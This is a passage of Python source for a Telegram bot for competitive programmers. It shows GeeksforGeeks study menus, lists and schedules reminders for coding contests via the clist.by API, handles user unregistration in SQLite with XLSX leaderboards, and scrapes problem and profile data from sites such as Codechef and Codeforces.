keyboard = [[InlineKeyboardButton("Linked Lists", callback_data='Linked Listsgfg2'),
InlineKeyboardButton("Stacks", callback_data='Stacksgfg2')],
[InlineKeyboardButton("Queue", callback_data='Queuegfg2'),
InlineKeyboardButton("Binary Trees", callback_data='Binary Treesgfg2')],
[InlineKeyboardButton("Binary Search Trees",
callback_data='Binary Search Treesgfg2'),
InlineKeyboardButton("Heaps", callback_data='Heapsgfg2')],
[InlineKeyboardButton("Hashing", callback_data='Hashinggfg2'),
InlineKeyboardButton("Graphs", callback_data='Graphsgfg2')],
[InlineKeyboardButton("Advanced Data Structures", callback_data='Advanced Data Structuresgfg2'),
InlineKeyboardButton("Arrays", callback_data='Arraysgfg2')],
[InlineKeyboardButton("Matrix", callback_data='Matrixgfg2')]]
elif (val == "GATE.json"):
keyboard = [[InlineKeyboardButton("Operating Systems", callback_data='Operating Systemsgfg2'),
InlineKeyboardButton("Database Management Systems", callback_data='Database Management Systemsgfg2')],
[InlineKeyboardButton("Automata Theory", callback_data='Automata Theorygfg2'),
InlineKeyboardButton("Compilers", callback_data='Compilersgfg2')],
[InlineKeyboardButton("Computer Networks",
callback_data='Computer Networksgfg2'),
InlineKeyboardButton("GATE Data Structures and Algorithms",
callback_data='GATE Data Structures and Algorithmsgfg2')]]
elif (val == "Interview.json"):
keyboard = [[InlineKeyboardButton("Payu", callback_data='Payugfg2'),
InlineKeyboardButton("Adobe", callback_data='Adobegfg2')],
[InlineKeyboardButton("Amazon", callback_data='Amazongfg2'),
InlineKeyboardButton("Flipkart", callback_data='Flipkartgfg2')],
[InlineKeyboardButton("Google",
callback_data='Googlegfg2'),
InlineKeyboardButton("Microsoft", callback_data='Microsoftgfg2')],
[InlineKeyboardButton("Snapdeal", callback_data='Snapdealgfg2'),
InlineKeyboardButton("Zopper-Com", callback_data='Zopper-Comgfg2')],
[InlineKeyboardButton("Yahoo", callback_data='Yahoogfg2'),
InlineKeyboardButton("Cisco", callback_data='Ciscogfg2')],
[InlineKeyboardButton("Facebook", callback_data='Facebookgfg2'),
InlineKeyboardButton("Yatra.Com", callback_data='Yatra.Comgfg2')],
[InlineKeyboardButton("Symantec", callback_data='Symantecgfg2'),
InlineKeyboardButton("Myntra", callback_data='Myntragfg2')],
[InlineKeyboardButton("Groupon", callback_data='Groupongfg2'),
InlineKeyboardButton("Belzabar", callback_data='Belzabargfg2')],
[InlineKeyboardButton("Paypal", callback_data='Paypalgfg2'),
InlineKeyboardButton("Akosha", callback_data='Akoshagfg2')],
[InlineKeyboardButton("Linkedin", callback_data='Linkedingfg2'),
InlineKeyboardButton("Browserstack", callback_data='Browserstackgfg2')],
[InlineKeyboardButton("Makemytrip", callback_data='Makemytripgfg2'),
InlineKeyboardButton("Infoedge", callback_data='Infoedgegfg2')],
[InlineKeyboardButton("Practo", callback_data='Practogfg2'),
InlineKeyboardButton("Housing-Com", callback_data='Housing-Comgfg2')],
[InlineKeyboardButton("Ola-Cabs", callback_data='Ola-Cabsgfg2'),
InlineKeyboardButton("Grofers", callback_data='Grofersgfg2')],
[InlineKeyboardButton("Thoughtworks", callback_data='Thoughtworksgfg2'),
InlineKeyboardButton("Delhivery", callback_data='Delhiverygfg2')],
[InlineKeyboardButton("Taxi4Sure", callback_data='Taxi4Suregfg2'),
InlineKeyboardButton("Lenskart", callback_data='Lenskartgfg2')]]
reply_markup = InlineKeyboardMarkup(keyboard)
bot.edit_message_text(text="Please select", reply_markup=reply_markup, chat_id=query.message.chat_id,
message_id=query.message.message_id)
return GFG2
# FUNCTION TO SHOW SUBMENU 2
def gfg2(bot, update, user_data):
query = update.callback_query
val = query.data
val=str(val).replace("gfg2","")
if (val == "Advanced Data Structures"):
keyboard = [[InlineKeyboardButton("Advanced Lists", callback_data='Advanced Listsgfg3'),
InlineKeyboardButton("Trie", callback_data='Triegfg3')],
[InlineKeyboardButton("Suffix Array and Suffix Tree", callback_data='Suffix Array and Suffix Treegfg3'),
InlineKeyboardButton("AVL Tree", callback_data='AVL Treegfg3')],
[InlineKeyboardButton("Splay Tree",
callback_data='Splay Treegfg3'),
InlineKeyboardButton("B Tree", callback_data='B Treegfg3')],
[InlineKeyboardButton("Segment Tree", callback_data='Segment Treegfg3'),
InlineKeyboardButton("Red Black Tree", callback_data='Red Black Treegfg3')],
[InlineKeyboardButton("K Dimensional Tree", callback_data='K Dimensional Treegfg3'),
InlineKeyboardButton("Others", callback_data='Othersgfg3')]]
reply_markup = InlineKeyboardMarkup(keyboard)
bot.edit_message_text(text="Please select", reply_markup=reply_markup, chat_id=query.message.chat_id,
message_id=query.message.message_id)
return GFG3
else:
try:
with open(user_data['gfg'], encoding='utf-8') as data_file:
data = json.load(data_file)
se = data[val]
s = ""
s1 = ""
a = 0
for i in se:
a = a + 1
if (a <= 50):
s = s + '<a href="' + se[i] + '">' + i + '</a>\n\n'
else:
s1 = s1 + '<a href="' + se[i] + '">' + i + '</a>\n\n'
bot.edit_message_text(text=val + "\n\n" + s, chat_id=query.message.chat_id,
message_id=query.message.message_id, parse_mode=ParseMode.HTML)
if (len(s1) != 0):
bot.send_message(text=val + "\n\n" + s1, chat_id=query.message.chat_id, parse_mode=ParseMode.HTML)
except:
return ConversationHandler.END
user_data.clear()
return ConversationHandler.END
# FUNCTION TO SHOW SUBMENU 3
def gfg3(bot, update, user_data):
query = update.callback_query
try:
val = query.data
val=str(val).replace("gfg3","")
with open(user_data['gfg'], encoding='utf-8') as data_file:
data = json.load(data_file)
se = data["Advanced Data Structures"][val]
s = ""
for i in se:
s = s + '<a href="' + se[i] + '">' + i + '</a>\n\n'
bot.edit_message_text(text=val + "\n\n" + s, chat_id=query.message.chat_id,
message_id=query.message.message_id, parse_mode=ParseMode.HTML)
except:
return ConversationHandler.END
user_data.clear()
return ConversationHandler.END
# END OF CONVERSATION HANDLER FOR GEEKS FOR GEEKS
# GLOBAL VARIABLES STORE THE PREVIOUS DATA TEMPORARILY IN CASE THE WEBPAGE IS BEING MAINTAINED
ong = ""
upc = ""
# COMMAND HANDLER FUNCTION TO SHOW LIST OF ONGOING COMPETITIONS
@timeouts.wrapper
def ongoing(bot, update):
global ong
# PARSING JSON
date1 = update.message.date
payload = {'limit': '15', 'start__lt': str(date1), 'end__gt': str(date1),
'username': CLIST_USER_NAME, 'api_key': CLIST_API_KEY, 'format': 'json', 'order_by': 'end'}
url = "https://clist.by/api/v1/contest/?"
url = url + urllib.parse.urlencode(payload)
opener = urllib.request.build_opener()
opener.addheaders = [('Content-Type', 'application/json')]
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
rawData = opener.open(url).read().decode('utf-8')
try:
jsonData = json.loads(rawData)
searchResults = jsonData['objects']
s = ""
i=0
for er in searchResults:
i=i+1
if(i==16):
break
title = er['event']
start = er['start']
sec = timedelta(seconds=int(er['duration']))
d = datetime(1, 1, 1) + sec
duration = ("%d days %d hours %d min" % (d.day - 1, d.hour, d.minute))
host = er['resource']['name']
contest = er['href']
start1 = time_converter(start, '+0530')
s = s + title + "\n" + "Start:\n" + start.replace("T", " ") + " GMT\n" + str(
start1).replace("T",
" ") + " IST\n" + "Duration:" + duration + "\n" + host + "\n" + contest + "\n\n"
ong = s
update.message.reply_text(s)
except:
update.message.reply_text(ong)
# FUNCTION TO CONVERT TIME FROM UTC TO OTHER TIME ZONE
def time_converter(old_time, time_zone):
time_zone = float(time_zone[:3] + ('.5' if time_zone[3] == '3' else '.0'))
str_time = datetime.strptime(old_time, "%Y-%m-%dT%H:%M:%S")
return (str_time + timedelta(hours=time_zone)).strftime("%Y-%m-%dT%H:%M:%S")
# START OF CONVERSTION HANDLER TO SHOW A LIST OF UPCOMING COMPETITIONS AND GET REMINDERS
@timeouts.wrapper
def upcoming(bot, update):
global upc
# PARSING JSON
date1=update.message.date
payload={'limit':'15','start__gt':str(date1),'order_by':'start','username':CLIST_USER_NAME,'api_key':CLIST_API_KEY,'format':'json'}
url="https://clist.by/api/v1/contest/?"
url=url+urllib.parse.urlencode(payload)
opener = urllib.request.build_opener()
opener.addheaders = [('Content-Type', 'application/json')]
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
rawData = opener.open(url).read().decode('utf-8')
try:
jsonData = json.loads(rawData)
searchResults = jsonData['objects']
i = 0
s = ""
keyboard=[]
keyboard1=[]
for er in searchResults:
i = i + 1
# LIMITING NO OF EVENTS TO 20
if i == 16:
break
title = er['event']
start = er['start']
sec = timedelta(seconds=int(er['duration']))
d = datetime(1, 1, 1) + sec
duration = ("%d days %d hours %d min" % (d.day - 1, d.hour, d.minute))
host = er['resource']['name']
contest = er['href']
start1 = time_converter(start, '+0530')
keyboard1.append(InlineKeyboardButton(str(i), callback_data=str(i)))
s = s + str(i) + ". " + title + "\n" + "Start:\n" + start.replace("T", " ") + " GMT\n" + str(
start1).replace("T",
" ") + " IST\n" + "Duration: " + str(duration) + "\n" + host + "\n" + contest + "\n\n"
if i%5==0:
keyboard.append(keyboard1)
keyboard1 = []
keyboard.append(keyboard1)
upc = searchResults
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text(s + "Select competition number to get notification" + "\n\n",
reply_markup=reply_markup)
except:
i = 0
s = ""
keyboard = []
keyboard1 = []
for er in upc:
i = i + 1
# LIMITING NO OF EVENTS TO 20
if i == 16:
break
title = er['event']
start = er['start']
sec = timedelta(seconds=int(er['duration']))
d = datetime(1, 1, 1) + sec
duration = ("%d days %d hours %d min %d sec" % (d.day - 1, d.hour, d.minute, d.second))
host = er['resource']['name']
contest = er['href']
start1 = time_converter(start, '+0530')
keyboard1.append(InlineKeyboardButton(str(i), callback_data=str(i)))
s = s + str(i) + ". " + title + "\n" + "Start:\n" + start.replace("T", " ") + " GMT\n" + str(
start1).replace("T",
" ") + " IST\n" + "Duration: " + str(duration) + "\n" + host + "\n" + contest + "\n\n"
if i%5==0:
keyboard.append(keyboard1)
keyboard1 = []
keyboard.append(keyboard1)
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text(s + "\n\n" + "Select competition number to get notification",
reply_markup=reply_markup)
return SCHED
jobstores = {
'default': SQLAlchemyJobStore(url='sqlite:///'+mount_point+'coders1.db')
}
schedule = BackgroundScheduler(jobstores=jobstores)
schedule.start()
# FUNCTION TO SET REMINDER
def remind(bot, update):
query = update.callback_query
msg = query.data
if str(msg).isdigit():
msg = int(msg) - 1
start1 = time_converter(upc[msg]['start'], '-0030')
dateT = str(upc[msg]['start']).replace("T", " ").split(" ")
start1 = start1.replace("T", " ").split(" ")
date = dateT[0].split("-")
date1 = start1[0].split("-")
time1 = start1[1].split(":")
schedule.add_job(remindmsgDay, 'cron', year=date[0], month=date[1], day=date[2], replace_existing=True,
id=str(query.message.chat_id) + str(upc[msg]['id']) + "0",
args=[str(query.message.chat_id),
str(upc[msg]['event']) + "\n" + str(upc[msg]['href'])])
schedule.add_job(remindmsg, 'cron', year=date1[0], month=date1[1], day=date1[2], hour=time1[0], minute=time1[0],
replace_existing=True,
id=str(query.message.chat_id) + str(upc[msg]['id']) + "1",
args=[str(query.message.chat_id),
str(upc[msg]['event'] + "\n" + str(upc[msg]['href']))])
bot.edit_message_text(chat_id=query.message.chat_id, message_id=query.message.message_id,
text="I will remind you about " + upc[msg]['event']+"\nYou can use command /dontremindme to cancel reminder")
if query.message.chat_id<0:
bot.send_message(chat_id=query.message.chat_id,text="I detected this is a group. The reminder will be sent to the group. If you want to get reminder personally then use this command in private message")
return ConversationHandler.END
# WHAT HAPPENSWHEN REMINDER IS DEPLOYED
def remindmsgDay(chatId, message):
bot = Bot(TOKEN)
bot.send_message(chat_id=chatId, text="You have a contest today\n " + message)
def remindmsg(chatId, message):
bot = Bot(TOKEN)
bot.send_message(chat_id=chatId, text="Your contest starts in half an hour\n " + message)
# END OF CONVERSTION HANDLER TO SHOW A LIST OF UPCOMING COMPETITIONS AND GET REMINDERS
# START OF CONVERSATION HANDLER TO REMOVE REMINDERS
@timeouts.wrapper
def removeRemind(bot, update ):
cid = update.message.chat_id
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
c.execute("SELECT id FROM apscheduler_jobs WHERE id LIKE " + "'" + str(
update.message.chat_id) + "%' AND id LIKE " + "'%0'")
if (c.fetchone()):
c.execute("SELECT id FROM apscheduler_jobs WHERE id LIKE " + "'" + str(
update.message.chat_id) + "%' AND id LIKE " + "'%0'")
a = c.fetchall()
keyboard=[]
for i in range(0, len(a)):
s =str(a[i]).replace("('", "").replace("',)", "").replace(
'("', "").replace('",)', "")
print(s)
keyboard.append([InlineKeyboardButton(str(schedule.get_job(job_id=s).args[1].split("\n")[0]), callback_data=s[:-1]+"notiplz")])
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text("Here are your pending reminders\nSelect the reminder you want to remove",reply_markup=reply_markup)
c.close()
return REMNOTI
else:
c.close()
update.message.reply_text("You have no pending reminders")
return ConversationHandler.END
def remnoti(bot, update):
query=update.callback_query
val =str(query.data).replace("notiplz", "")
schedule.remove_job(val + "0")
schedule.remove_job(val + "1")
bot.edit_message_text(text="Reminder removed", message_id=query.message.message_id,
chat_id=query.message.chat_id)
return ConversationHandler.END
# END OF CONVERSATION HANDLER TO REMOVE REMINDERS
# START OF CONVERSATION HANDLER FOR UNREGISTERING
@timeouts.wrapper
def unregister(bot, update):
keyboard = [[InlineKeyboardButton("Hackerearth", callback_data='HErem2'),
InlineKeyboardButton("Hackerrank", callback_data='HRrem2')],
[InlineKeyboardButton("Codechef", callback_data='CCrem2'),
InlineKeyboardButton("Spoj", callback_data='SPrem2')],
[InlineKeyboardButton("Codeforces", callback_data='CFrem2'),
InlineKeyboardButton("ALL", callback_data='ALLrem2')]]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text("Select the judge you want to unregister from", reply_markup=reply_markup)
return REMOVER
# FUNCTION FOR REMOVING DATA FROM DATABASE ACCORDING TO USERS CHOICE
def remover(bot, update):
query = update.callback_query
val = query.data
val=str(val).replace("rem2","")
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
a = str(query.from_user.id)
c.execute("SELECT id FROM handles WHERE id=(?)", (a,))
if not c.fetchone():
bot.edit_message_text(text='You are not registered to the bot. Please register using /register command',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
conn.close()
return ConversationHandler.END
if val == "ALL":
# IF USER CHOSE ALL THEN DELETING HIS ENTIRE ROW FROM TABLES
c.execute("DELETE FROM datas WHERE id = (?)", (a,))
c.execute("DELETE FROM handles WHERE id = (?)", (a,))
c.execute("DELETE FROM priority WHERE id = (?)", (a,))
conn.commit()
bot.edit_message_text(text='Unregistering please wait',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
# RECREATING ALL XLSX FILES
workbook = Workbook(mount_point+"HE.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute("SELECT datas.name, datas.HE FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.HE AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point+"HR.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.HR FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.HR AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point+"SP.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute("SELECT name, SP FROM datas")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point+"CF.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.CF FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CF AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
workbook = Workbook(mount_point+"CC.xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas.CC FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CC AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
else:
c.execute("SELECT "+val+" FROM handles WHERE id=(?)", (a,))
for row in c:
if row[0] is None or row[0]=="":
bot.edit_message_text(text='You are not registered to the bot. Please register using /register command',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
conn.close()
return ConversationHandler.END
# OTHER WISE REMOVING THE PARTICULAR ENTRY
c.execute("UPDATE datas SET " + val + " = (?) WHERE id = (?) ", ("", a))
c.execute("UPDATE handles SET " + val + " = (?) WHERE id = (?) ", ("", a))
if not val=='SP':
c.execute("UPDATE priority SET " + val + " = (?) WHERE id = (?) ", ("", a))
conn.commit()
bot.edit_message_text(text='Unregistering please wait',
chat_id=query.message.chat_id,
message_id=query.message.message_id)
c.execute("SELECT name, " + val + " FROM datas")
# RECREATING XLSX FILE
workbook = Workbook(mount_point + val + ".xlsx")
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute(
"SELECT datas.name, datas." +val + " FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority." + val + " AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
c.execute("SELECT HE, HR, SP, CF, CC FROM handles WHERE id =(?)",(a,))
count=0
for row in c:
for i in row:
if i is None or i == "":
count=count+1
if count==5:
c.execute("DELETE FROM datas WHERE id = (?)", (a,))
c.execute("DELETE FROM handles WHERE id = (?)", (a,))
c.execute("DELETE FROM priority WHERE id = (?)", (a,))
conn.commit()
workbook = Workbook(mount_point+'all.xlsx')
worksheet = workbook.add_worksheet()
format = workbook.add_format()
format.set_align('top')
format.set_text_wrap()
mysel = c.execute("SELECT datas.name, datas.HE, datas.HR, datas.SP, datas.CF, datas.CC FROM datas INNER JOIN priority ON datas.id=priority.id ORDER BY CAST(priority.CF AS FLOAT) DESC, CAST(priority.CC AS FLOAT) DESC, CAST(priority.HR AS FLOAT) DESC, CAST(priority.HE AS FLOAT) DESC")
for i, row in enumerate(mysel):
for j, value in enumerate(row):
worksheet.write(i, j, row[j], format)
worksheet.set_row(i, 170)
worksheet.set_column(0, 5, 40)
workbook.close()
bot.send_message(chat_id=query.message.chat_id, text="Successfully unregistered")
conn.commit()
conn.close()
return ConversationHandler.END
# END OF CONVERSATION HANDLER FOR UNREGISTERING
sched = BackgroundScheduler()
# FUNCTION FOR UPDATING ALL THE QUESTIONS FROM CODECHEF
# SCHEDULED TO AUTOMATICALLY HAPPEN AT 18:30 GMT WHICH IS 0:0 IST
@sched.scheduled_job('cron', day_of_week='sat-sun', hour=18, minute=30)
def qupd():
global reqccc, reqcce, reqcch, reqccm, reqccs, conccc, concce, concch, conccm, conccs, scce, s1cce, scch, s1cch, sccm, s1ccm, sccs, s1ccs, sccc, s1ccc, soupccc, soupcce, soupcch, soupccm, soupccs
try:
reqcce = urllib.request.Request("https://www.codechef.com/problems/easy/", headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"})
reqccs = urllib.request.Request("https://www.codechef.com/problems/school/", headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"})
reqccm = urllib.request.Request("https://www.codechef.com/problems/medium/", headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"})
reqcch = urllib.request.Request("https://www.codechef.com/problems/hard/", headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"})
reqccc = urllib.request.Request("https://www.codechef.com/problems/challenge/", headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"})
concce = urllib.request.urlopen(reqcce)
soupcce = bs.BeautifulSoup(concce, "html5lib")
scce = soupcce.find_all('div', {"class": "problemname"})
s1cce = soupcce.find_all('a', {"title": "Submit a solution to this problem."})
conccs = urllib.request.urlopen(reqccs)
soupccs = bs.BeautifulSoup(conccs, "html5lib")
sccs = soupccs.find_all('div', {"class": "problemname"})
s1ccs = soupccs.find_all('a', {"title": "Submit a solution to this problem."})
conccm = urllib.request.urlopen(reqccm)
soupccm = bs.BeautifulSoup(conccm, "html5lib")
sccm = soupccm.find_all('div', {"class": "problemname"})
s1ccm = soupccm.find_all('a', {"title": "Submit a solution to this problem."})
concch = urllib.request.urlopen(reqcch)
soupcch = bs.BeautifulSoup(concch, "html5lib")
scch = soupcch.find_all('div', {"class": "problemname"})
s1cch = soupcch.find_all('a', {"title": "Submit a solution to this problem."})
conccc = urllib.request.urlopen(reqccc)
soupccc = bs.BeautifulSoup(conccc, "html5lib")
sccc = soupccc.find_all('div', {"class": "problemname"})
s1ccc = soupccc.find_all('a', {"title": "Submit a solution to this problem."})
bot = Bot(TOKEN)
for chatids in adminlist:
bot.send_message(chat_id=chatids, text="Questions updated codechef")
except urllib.error.URLError:
pass
# FUNCTION FOR UPDATING ALL THE QUESTIONS FROM CODEFORCES
# SCHEDULED TO AUTOMATICALLY HAPPEN AT 18:30 GMT WHICH IS 0:0 IST
@sched.scheduled_job('cron', day_of_week='sat-sun', hour=18, minute=30)
def updateCf():
global qcf
bot = Bot(TOKEN)
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
source1 = opener.open("http://www.codeforces.com/problemset")
soup1 = bs.BeautifulSoup(source1, 'html5lib')
endpage = int(soup1.findAll('span', {"class": "page-index"})[-1].getText())
latest = soup1.find('td', {"class": "id"}).text
with open(mount_point+'codeforces.json', 'r') as codeforces:
data = json.load(codeforces)
latest1 = data['latest']
if latest1 == latest:
return
else:
data['latest'] = latest
signal = True
for i in range(1, endpage + 1):
if signal == False:
for chatids in adminlist:
bot.send_message(chat_id=chatids, text="Codeforces questions up to date")
break
source = opener.open("http://www.codeforces.com/problemset/page/" + str(i))
soup = bs.BeautifulSoup(source, 'html5lib')
for s1 in soup.findAll('td', {"class": "id"}):
idcur = s1.text
s2 = s1.find('a')
if idcur == latest1:
signal = False
break
else:
save = "http://www.codeforces.com" + s2.get('href')
if 'A' in save:
data['A'].append(save)
elif 'B' in save:
data['B'].append(save)
elif 'C' in save:
data['C'].append(save)
elif 'D' in save:
data['D'].append(save)
elif 'E' in save:
data['E'].append(save)
elif 'F' in save:
data['F'].append(save)
else:
data['OTHERS'].append(save)
os.remove(mount_point+'codeforces.json')
with open(mount_point+'codeforces.json', 'w') as codeforces:
json.dump(data, codeforces)
with open(mount_point+'codeforces.json', 'r') as codeforces:
qcf = json.load(codeforces)
for chatids in adminlist:
bot.send_message(chat_id=chatids, text="Questions updated codeforces")
# FUNCTION FOR UPDATING ALL THE DETAILS IN DATAS TABLE
# SCHEDULED TO AUTOMATICALLY HAPPEN AT 18:30 GMT WHICH IS 0:0 IST
@sched.scheduled_job('cron', hour=18, minute=30)
def updaters():
global timeouts
timeouts = Spam_settings()
conn = sqlite3.connect(mount_point+'coders1.db')
c = conn.cursor()
c.execute('SELECT id, HE, HR, CC, SP, CF FROM handles')
for row in c.fetchall():
a = ""
he = ""
hr = ""
sp = ""
cc = ""
cf = ""
for wo in range(0, 6):
if wo == 0:
a = row[wo]
elif wo == 1 and (row[wo] != '' and row[wo] is not None):
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('https://www.hackerearth.com/@' + str(row[wo]))
soup = bs.BeautifulSoup(sauce, 'html5lib')
stri = "HACKEREARTH\n"
for i in soup.find_all('a', {
"href": "/users/" + str(row[wo]) + "/activity/hackerearth/#user-rating-graph"}):
stri = stri + i.text + "\n"
for i in soup.find_all('a', {"href": "/@" + str(row[wo]) + "/followers/"}):
stri = stri + i.text + "\n"
for i in soup.find_all('a', {"href": "/@" + str(row[wo]) + "/following/"}):
stri = stri + i.text + "\n"
he = stri
except urllib.error.URLError as e:
pass
elif wo == 2 and (row[wo] != '' and row[wo] is not None):
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('https://www.hackerrank.com/' + str(row[wo]) + '?hr_r=1')
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('script', {"id": "initialData"}).text
s = soup.find('script', {"id": "initialData"}).text
i = s.find("hacker_id", s.find("hacker_id", s.find("hacker_id") + 1) + 1)
i = parse.unquote(s[i:i + 280]).replace(",", ">").replace(":", " ").replace("{", "").replace(
"}",
"").replace(
'"', "").split(">")
s1 = "HACKERRANK\n"
for j in range(1, 10):
s1 = s1 + i[j] + "\n"
hr = s1
except AttributeError:
pass
except urllib.error.URLError as e:
pass
elif wo == 3 and (row[wo] != '' and row[wo] is not None):
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
count=0
while(count<5):
try:
sauce = opener.open('https://www.codechef.com/users/' + str(row[wo]))
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('a', {"href": "http://www.codechef.com/ratings/all"}).text
try:
s1 = soup.find('span', {"class": "rating"}).text + "\n"
except AttributeError:
s1 = ""
s = "CODECHEF" + "\n" + s1 + "rating: " + soup.find('a', {
"href": "http://www.codechef.com/ratings/all"}).text + "\n" + soup.find('div', {
"class": "rating-ranks"}).text.replace(" ", "").replace("\n\n", "").strip('\n')
cc = s
break
except AttributeError:
break
except urllib.error.URLError as e:
count=count+1
continue
elif wo == 4 and (row[wo] != '' and row[wo] is not None):
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('http://www.spoj.com/users/' + str(row[wo]) + '/')
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('div', {"class": "col-md-3"}).text
s = soup.find('div', {"class": "col-md-3"}).text.strip('\n\n').replace("\t", "").split('\n')
s = s[3].strip().split(":")
s = "SPOJ\n" + s[0] + "\n" + s[1].strip(" ") + "\n" + soup.find('dl', {
"class": "dl-horizontal profile-info-data profile-info-data-stats"}).text.replace("\t",
"").replace(
"\xa0", "").strip('\n')
sp = s
except AttributeError:
pass
except urllib.error.URLError as e:
pass
elif wo == 5 and (row[wo] != '' and row[wo] is not None):
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
try:
sauce = opener.open('http://codeforces.com/profile/' + str(row[wo]))
soup = bs.BeautifulSoup(sauce, 'html5lib')
try:
soup.find('img', {"alt": "User\'\'s contribution into Codeforces community"}).text
s = soup.find_all('span', {"style": "font-weight:bold;"})
if len(s) == 0:
s2 = ""
else:
s2 = "contest rating: " + s[0].text + "\n" + "max: " + s[1].text + s[2].text + "\n"
s1 = "CODEFORCES\n" + s2 + "contributions: " + soup.find('img', {"alt": "User\'\'s contribution into Codeforces community"}).nextSibling.nextSibling.text
cf = s1
except AttributeError:
pass
except urllib.error.URLError as e:
pass
if not he == '' or (he == '' and (row[1] == '' or row[1] is None)):
c.execute("UPDATE datas SET HE=(?) WHERE id=(?)", (he,str(a)))
try:
rat = he.split('\n')
if (rat[1] == "Rating"):
rat2 = rat[2].strip(" ").strip("\n")
c.execute("UPDATE priority SET HE = (?) WHERE id = (?) ", (rat2, str(a)))
except:
pass
if not hr == '' or (hr == '' and (row[2] == '' or row[2] is None)):
c.execute("UPDATE datas SET HR=(?) WHERE id=(?)", (hr,str(a)))
try:
rat = hr.split('\n')
rat2 = rat[1].split(" ")[1].strip(" ").strip("\n")
c.execute("UPDATE priority SET HR = (?) WHERE id = (?) ", (rat2, str(a)))
except:
pass
if not cf == '' or (cf == '' and (row[5] == '' or row[5] is None)):
c.execute("UPDATE datas SET CF=(?) WHERE id=(?)", (cf,str(a)))
try:
rat = cf.split("\n")
if "contest rating:" in rat[1]:
rat2 = rat[1].split(" ")[2].strip(" ").strip("\n")
c.execute("UPDATE priority SET CF = (?) WHERE id = (?) ", (rat2, str(a)))
except:
pass
if not cc == '' or (cc == '' and (row[3] == '' or row[3] is None)):
c.execute("UPDATE datas SET CC=(?) WHERE id=(?)", (cc,str(a)))
try:
rat = cc.split("\n")
if not "rating" in rat[1]:
rat2 = rat[2].split(" ")[1].strip(" ").strip("\n")
c.execute("UPDATE priority SET CC = (?) WHERE id = (?) ", (rat2, str(a)))
except:
pass
if not sp == '' or (sp == '' and (row[4] == '' or row[4] is None)):
c.execute("UPDATE datas SET SP=(?) WHERE id=(?)", (sp,str(a)))
# RECREATING ALL THE XLSX FILES
